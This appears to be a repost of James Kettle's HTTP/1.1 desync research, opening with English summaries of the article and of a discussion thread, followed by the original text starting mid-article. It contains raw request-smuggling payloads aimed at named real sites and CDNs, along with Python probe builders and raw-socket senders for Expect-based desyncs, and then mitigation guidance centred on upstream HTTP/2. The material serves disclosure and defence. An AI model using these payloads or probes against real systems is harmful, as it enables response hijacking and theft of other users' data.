HTTP/1.1 must die: the desync endgame

Original link: https://portswigger.net/research/http1-must-die

This research documents a series of successful HTTP/1.1 desync attacks that have earned the author over $350,000 in bug bounties. The core weakness is HTTP/1.1's flawed request-separation mechanism, which lets attackers manipulate server responses and potentially access sensitive data - for example, other users' vulnerability reports (GitLab, $7,000) or hijacked responses across an entire CDN (Netlify, Akamai). Obfuscating the "Expect" header proved particularly effective, enabling Response Queue Poisoning (RQP) and Content-Length (CL) desyncs. One major finding involved Akamai and affected numerous websites, including LastPass ($5,000 bounty) and possibly even example.com. Reporting the Akamai flaw earned a $9,000 bounty and CVE-2025-32094, but the broad impact caused considerable stress and support load. The author argues that patching HTTP/1.1 is not enough because the complexity is inherent to the protocol; the real solution is migrating to HTTP/2, a binary protocol that is far less susceptible to these attacks. The research urges wider adoption of HTTP/2 and encourages security researchers to actively identify and report HTTP/1.1 vulnerabilities to accelerate its retirement.

## HTTP/1.1 Vulnerabilities and the Push for HTTP/2

A recent article argues that HTTP/1.1's inherent design flaws mean it needs to be replaced, citing ongoing request smuggling vulnerabilities affecting major tech companies such as Fastly and Mozilla. The core problem is ambiguous parsing rules that let malicious actors exploit discrepancies between front-end and back-end servers. While HTTP/2 is proposed as the solution, the discussion reveals concerns about its complexity and implementation challenges. Many commenters point to the difficulty of building stable HTTP/2 servers and clients even in languages like Python and Go. Some suggest a simplified "HTTP/2-Lite" configuration could mitigate these issues. However, many argue that the problem lies not with the protocol itself but with careless engineering, and that better parser implementations, rather than a protocol switch, are the key. There are also concerns that abandoning HTTP/1.1 would disproportionately affect smaller, simpler website setups and could sacrifice readability and accessibility. Ultimately, the debate centres on whether a complex protocol upgrade is the best approach, or whether focusing on robust implementations of the existing standard would be more effective.

Original text

    Host: <redacted>.t-mobile.com
    Expect: 100-continue
    Content-Length: 291

    GET /logout HTTP/1.1
    Host: <redacted>.t-mobile.com
    Content-Length: 100

    GET / HTTP/1.1
    Host: <redacted>.t-mobile.com

    GET https://psres.net/assets HTTP/1.1
    X: y

    GET / HTTP/1.1
    Host: <redacted>.t-mobile.com

T-Mobile awarded us $12,000 for this finding - a highly competitive payout for a non-production domain.

0.CL desync via obfuscated Expect - Gitlab

Sending a lightly obfuscated Expect header exposes a substantial number of new targets. For example, "Expect: y 100-continue" causes a 0.CL desync on h1.sec.gitlab.net. This was an interesting target as it holds the attachments to reports sent to Gitlab's bug bounty program - potentially critical zerodays.
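
Off-the-shelf HTTP clients tend to normalise or reject a header like "Expect: y 100-continue", so probes of this kind are generally delivered over a raw socket. The following is a rough Python sketch of that delivery step - my illustration, not the tooling used in this research, and the host, path and body are placeholders:

    import socket
    import ssl

    def send_raw_probe(host: str, port: int = 443) -> bytes:
        """Deliver an HTTP/1.1 request containing an obfuscated Expect header
        byte-for-byte, and return whatever raw response data comes back."""
        request = (
            "POST / HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Expect: y 100-continue\r\n"   # the obfuscated variant described above
            "Content-Length: 1\r\n"
            "\r\n"
            "X"
        ).encode()

        ctx = ssl.create_default_context()
        with socket.create_connection((host, port), timeout=10) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                tls.sendall(request)
                chunks = []
                try:
                    while True:
                        data = tls.recv(4096)
                        if not data:
                            break
                        chunks.append(data)
                except TimeoutError:  # socket.timeout is TimeoutError on Python 3.10+
                    pass              # server kept the connection open; use what we have
                return b"".join(chunks)

    # Example, with a placeholder host:
    # print(send_raw_probe("target.example").split(b"\r\n")[0])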

The site had a tiny attack surface so we weren't able to find a classic redirect or XSS desync gadget for exploitation. Instead, we opted to shoot for Response Queue Poisoning (RQP) - a high-impact attack which results in the server sending everyone random responses intended for other users. RQP is tricky on low-traffic targets due to an inherent race condition, but we persisted and 27,000 requests later we got access to someone else's vulnerability report video and a $7,000 bounty:

    GET / HTTP/1.1
    Content-Length: 686
    Expect: y 100-continue

    GET / HTTP/1.1
    Content-Length: 292

    GET / HTTP/1.1
    Host: h1.sec.gitlab.net

    GET / HTTP/1.1
    Host: h1.sec.gitlab.net

    GET /??? HTTP/1.1
    Authorization: ???
    User-Agent: Unknown Gitlab employee

    GET / HTTP/1.1
    Host: h1.sec.gitlab.net

After this, some high-end payouts took us to around $95,000 earned from 0.CL Expect-based desync attacks.

CL.0 desync via vanilla Expect - Netlify CDN

Proving that it can break servers in every possible way, Expect can also cause CL.0 desync vulnerabilities.

For example, we found a CL.0 RQP vulnerability in Netlify that, when triggered, sent us a continuous stream of responses from every website on the Netlify CDN:

    POST /images/ HTTP/1.1
    Host: <redacted-netlify-client>
    Expect: 100-continue
    Content-Length: 64

    GET /letter-picker HTTP/1.1
    Host: <redacted-netlify-client>

    POST /authenticate HTTP/1.1
    Host: ???
    User-Agent: Unknown Netlify user

    GET / HTTP/1.1
    Host: <redacted-netlify-client>
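
A generic way to hunt for this class of behaviour - a rough sketch of the concept rather than the exact methodology used here, with a placeholder path - is to send a request whose declared body is itself a complete request, then check whether more than one final response comes back on the same connection:

    def build_cl0_probe(host: str) -> bytes:
        """Build a CL.0-style probe: a POST whose declared body is itself a
        complete GET, so a back-end that ignores the Content-Length will treat
        that body as the next request on the connection."""
        smuggled = f"GET /robots.txt HTTP/1.1\r\nHost: {host}\r\n\r\n"
        return (
            "POST / HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Expect: 100-continue\r\n"
            f"Content-Length: {len(smuggled)}\r\n"
            "\r\n" + smuggled
        ).encode()

    def looks_desynced(raw_response: bytes) -> bool:
        """Crude heuristic over the bytes read back from one connection (e.g. via
        the raw-socket helper sketched earlier): more than one non-interim status
        line in reply to a single request suggests the body was parsed separately."""
        finals = [
            line for line in raw_response.split(b"\r\n")
            if line.startswith(b"HTTP/1.1 ") and not line.startswith(b"HTTP/1.1 100")
        ]
        return len(finals) > 1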

We found this while testing a particular Netlify-hosted website, but it didn't make sense to report it to them as the responses we hijacked were all coming from third-party websites.

The attack stopped working shortly after we found it, but we reported it to Netlify anyway and received the reply "Websites utilizing Netlify are out of scope", and no bounty. Normally, when I encounter a surprising bounty outcome, I don’t mention it as it tends to distract readers from the technical content. I’ve made an exception here because it provides useful context for what happened next.

CL.0 desync via obfuscated Expect - Akamai CDN

Unsurprisingly, obfuscating the Expect header revealed even more CL.0 desync vulnerabilities. Here's an example we found that let us serve arbitrary content to users accessing auth.lastpass.com, netting their maximum bounty - $5,000:

    OPTIONS /anything HTTP/1.1
    Host: auth.lastpass.com
    Expect: 100-continue
    Content-Length: 39

    GET / HTTP/1.1
    Host: www.sky.com
    X: X

    GET /anything HTTP/1.1
    Host: auth.lastpass.com

We quickly realised this affected a large number of targets using the Akamai CDN. In fact, I believe we could have used it to take control of possibly the most prestigious domain on the internet - example.com! Unfortunately, example.com doesn't have a VDP, so validating this would have been illegal. Unless Akamai informs us, we'll probably never know for certain.

Still, this raised a question. Should we report the issue directly to affected companies, or to Akamai? As a researcher, maintaining a good relationship with both CDNs and their customers is really important, and any bounties I earn go to charity so I don't have a personal stake. However, I could see that the bounty hunters would have discovered the issue independently without my help, and didn't want to sabotage their income. Ultimately, I decided to step back - I didn't get involved in exploring or reporting the issue, and didn't take a cut of the bounties. Part of me regrets this a little because it ultimately resulted in 74 separate bounties, totalling $221,000.

The reports were well received, but things didn't go entirely smoothly. It transpired that the vulnerability was actually fully inside Akamai's infrastructure, so Akamai was inundated with support tickets from their clients. I became concerned that the technique might leak while Akamai was still vulnerable, and reached out to Akamai to help them fix it faster. The issue was assigned CVE-2025-32094, and I was awarded a $9,000 bounty. They were able to release a hotfix for some customers quickly, but it still took 65 days from that point to fully resolve the vulnerability.

Overall, it was quite stressful, but at least I got some USD-backed evidence of the danger posed by HTTP/1.1. The total bounties earned from this research currently stand at slightly over $350,000.

Why patching HTTP/1.1 is not enough

All the attacks in this paper exploit implementation flaws, so it might seem strange to conclude that the solution is to abandon the entire protocol. However, all these attacks have the same root cause. HTTP/1.1's fatal flaw - poor request separation - means tiny bugs often have critical impact. This is compounded by two key factors.

First, HTTP/1.1 is only simple if you're not proxying. The RFC contains numerous landmines like the three different ways of specifying the length of a message, complexity bombs like Expect and Connection, and special cases like HEAD. These all interact with each other, and with parser discrepancies, to create countless critical vulnerabilities.
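
To make the message-length point concrete, here's a toy illustration - a deliberately simplified, classic CL.TE-style discrepancy rather than the Expect flaws above - of how two naive parsers can reach different conclusions about where the same request ends:

    # RFC 9112 allows a body to be delimited by Content-Length, by chunked
    # Transfer-Encoding, or by connection close. Two simplistic parsers that
    # pick different mechanisms disagree about where this request ends.
    RAW = (
        b"POST / HTTP/1.1\r\n"
        b"Host: example.com\r\n"
        b"Content-Length: 6\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n"
        b"0\r\n\r\nX"
    )

    def split_by_content_length(payload: bytes, length: int):
        """Parser A: trust Content-Length."""
        return payload[:length], payload[length:]

    def split_by_chunked(payload: bytes):
        """Parser B: trust chunked encoding (only the empty terminating chunk
        is handled here, which is all this toy example needs)."""
        end = payload.index(b"0\r\n\r\n") + 5
        return payload[:end], payload[end:]

    payload = RAW.split(b"\r\n\r\n", 1)[1]
    print(split_by_content_length(payload, 6))  # (b'0\r\n\r\nX', b'')  - nothing left over
    print(split_by_chunked(payload))            # (b'0\r\n\r\n', b'X') - 'X' starts the "next" request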

Second, the last six years have proven that we struggle to apply the types of patching and hardening that would truly resolve the threat. Applying robust validation or normalisation on front-end servers would help, but we're too afraid of breaking compatibility with legacy clients to do this. Instead, we resort to regex-based defences, which attackers can easily bypass.
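
As a toy example of that pattern - mine, not any specific vendor's rule - a filter written around last year's exact payload quietly waves the next obfuscation through:

    import re

    # Hypothetical regex "mitigation" that targets the exact header from a past
    # advisory instead of normalising or rejecting malformed requests outright.
    BLOCK_RULE = re.compile(r"^Expect:\s*100-continue\s*$", re.IGNORECASE | re.MULTILINE)

    def is_blocked(raw_headers: str) -> bool:
        return bool(BLOCK_RULE.search(raw_headers))

    print(is_blocked("Expect: 100-continue"))    # True  - yesterday's payload is caught
    print(is_blocked("Expect: y 100-continue"))  # False - the obfuscated variant sails through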

All these factors combine to mean one thing - more desync attacks are coming.

How secure is HTTP/2 compared to HTTP/1?

HTTP/2 is not perfect - it's significantly more complex than HTTP/1, and can be painful to implement. However, upstream HTTP/2+ makes desync vulnerabilities vastly less likely. This is because HTTP/2 is a binary protocol, much like TCP and TLS, with zero ambiguity about the length of each message. You can expect implementation bugs, but the probability that a given bug is actually exploitable is significantly lower.
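
The "zero ambiguity" point comes straight from the framing layer: every HTTP/2 frame begins with a fixed 9-byte header whose first three bytes state the payload length, so the receiver never has to infer where a message ends. A minimal parse of that header, following the frame layout in RFC 9113, looks like this:

    import struct
    from typing import NamedTuple

    class FrameHeader(NamedTuple):
        length: int      # 24-bit payload length - explicit, nothing to infer
        frame_type: int  # e.g. 0x0 DATA, 0x1 HEADERS
        flags: int
        stream_id: int   # 31 bits; the reserved top bit is masked off

    def parse_frame_header(buf: bytes) -> FrameHeader:
        """Parse the fixed 9-byte HTTP/2 frame header (RFC 9113, section 4.1)."""
        if len(buf) < 9:
            raise ValueError("need at least 9 bytes")
        length = int.from_bytes(buf[0:3], "big")
        frame_type, flags = buf[3], buf[4]
        (stream_raw,) = struct.unpack(">I", buf[5:9])
        return FrameHeader(length, frame_type, flags, stream_raw & 0x7FFFFFFF)

    # A HEADERS frame header for stream 1 carrying a 13-byte payload:
    print(parse_frame_header(bytes([0x00, 0x00, 0x0D, 0x01, 0x04, 0x00, 0x00, 0x00, 0x01])))
    # FrameHeader(length=13, frame_type=1, flags=4, stream_id=1)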

Most vulnerabilities found in HTTP/2 implementations to date are DoS flaws such as HTTP/2 Rapid Reset - an attack class that HTTP/1 has its fair share of. For a more serious vulnerability, you would typically need a memory safety issue or integer overflow as a root cause. Once again, these issues affect HTTP/1.1 implementations too. Of course, there are always exceptions - like CVE-2023-32731 and HTTP/3 connection contamination - and I look forward to seeing more research targeting these in the future.

Note that HTTP/2 downgrading, where front-end servers speak HTTP/2 with clients but rewrite it as HTTP/1.1 for upstream communication, provides minimal security benefit and actually makes websites more exposed to desync attacks.

You might encounter an argument stating that HTTP/1.1 is more secure than HTTP/2 because HTTP/1.1 implementations are older, and therefore more hardened. To counter this, I would like to draw a comparison between request smuggling and buffer overflows. Request smuggling has been a well-known threat for roughly six years. This means our defences against it are roughly as mature as our defences against buffer overflows were in 2002. It's time to switch to a memory-safe language.

How to defeat request smuggling with HTTP/2

First, ensure your origin server supports HTTP/2. Most modern servers do, so this shouldn't be a problem.
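
One quick way to check is to see which protocol the server selects during the TLS handshake - a sketch that assumes the origin terminates TLS itself and advertises HTTP/2 via ALPN, so it won't cover h2c or origins hidden behind another hop:

    import socket
    import ssl

    def negotiated_protocol(host: str, port: int = 443):
        """Offer h2 and http/1.1 via ALPN and report which one the server picks."""
        ctx = ssl.create_default_context()
        ctx.set_alpn_protocols(["h2", "http/1.1"])
        with socket.create_connection((host, port), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return tls.selected_alpn_protocol()

    # 'h2' suggests the origin will accept HTTP/2; 'http/1.1' or None means a
    # proxy in front of it would be stuck speaking HTTP/1.1 upstream.
    print(negotiated_protocol("example.com"))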

Next, toggle upstream HTTP/2 on your proxies. I've confirmed this is possible on the following vendors: HAProxy, F5 Big-IP, Google Cloud, Imperva, Apache (experimental), and Cloudflare (but they use HTTP/1 internally).

Unfortunately, the following vendors have not yet added support for upstream HTTP/2: nginx, Akamai, CloudFront, Fastly. Try raising a support ticket asking when they'll enable upstream HTTP/2 - hopefully they can at least provide a timeline. Also, have a look through their documentation to see if you can enable request normalisation - sometimes valuable mitigations are available but disabled by default.

Note that disabling HTTP/1 between the browser and the front-end is not required. These connections are rarely shared between different users and, as a result, they're significantly less dangerous. Just ensure they're converted to HTTP/2 upstream.

How to survive with HTTP/1.1

If you're currently stuck with upstream HTTP/1.1, there are some strategies you can use to try and help your website survive the inevitable future rounds of desync attacks until you can start using HTTP/2.

  • Enable all available normalization and validation options on the front-end server
  • Enable validation options on the back-end server
  • Avoid niche webservers - Apache and nginx are lower-risk
  • Perform regular scans with HTTP Request Smuggler
  • Disable upstream connection reuse (may impact performance)
  • Reject requests that have a body, if the method doesn't require one to be present (GET/HEAD/OPTIONS) - see the sketch after this list
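
For that last item, here's a hedged sketch of what the check can look like in application code - a hypothetical WSGI middleware rather than a drop-in for any particular front-end, and ideally this kind of rejection belongs on the front-end server itself:

    # Hypothetical WSGI middleware: refuse bodies on methods that shouldn't carry
    # one, so a smuggled request prefix has nowhere to hide.
    BODYLESS_METHODS = {"GET", "HEAD", "OPTIONS"}

    class RejectUnexpectedBodies:
        def __init__(self, app):
            self.app = app

        def __call__(self, environ, start_response):
            method = environ.get("REQUEST_METHOD", "GET").upper()
            # Most servers de-chunk before WSGI, but check Transfer-Encoding defensively.
            has_body = environ.get("CONTENT_LENGTH") not in (None, "", "0") or \
                       "HTTP_TRANSFER_ENCODING" in environ
            if method in BODYLESS_METHODS and has_body:
                start_response("400 Bad Request", [("Content-Type", "text/plain")])
                return [b"Request body not allowed for this method\n"]
            return self.app(environ, start_response)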

Finally, please be wary of vendor claims that WAFs can thwart desync attacks as effectively as upstream HTTP/2.

How you can help kill HTTP/1.1

Right now, the biggest barrier to killing upstream HTTP/1 is poor awareness of how dangerous it is. Hopefully this research will help a bit, but to make a lasting difference and ensure we're not in exactly the same place in six years' time, I need your help.

We need to collectively show the world how broken HTTP/1.1 is. Take HTTP Request Smuggler 3.0 for a spin, hack systems and get them patched with HTTP/2. Whenever possible, publish your findings so the rest of us can learn from them. Don't let targets escape you just by patching against the published methodology - adapt and customise techniques and tools, and never settle for the state of the art. It's not as hard as you think, and you definitely don't need years of research experience. For example, while wrapping this research up I realised a writeup published last year actually describes an Expect-based 0.CL desync, so you could have beaten me to these findings just by reading and applying that!

Finally, share the message - more desync attacks are always coming.

Over the last six years, we've seen that a design flaw in HTTP/1.1 regularly exposes websites to critical attacks. Attempts to hotfix individual implementations have failed to keep pace with the threat, and the only viable long-term solution is upstream HTTP/2. This is not a quick fix, but by spreading awareness of just how dangerous upstream HTTP/1.1 really is, we can help kill HTTP/1.1.

Good luck!

James Kettle
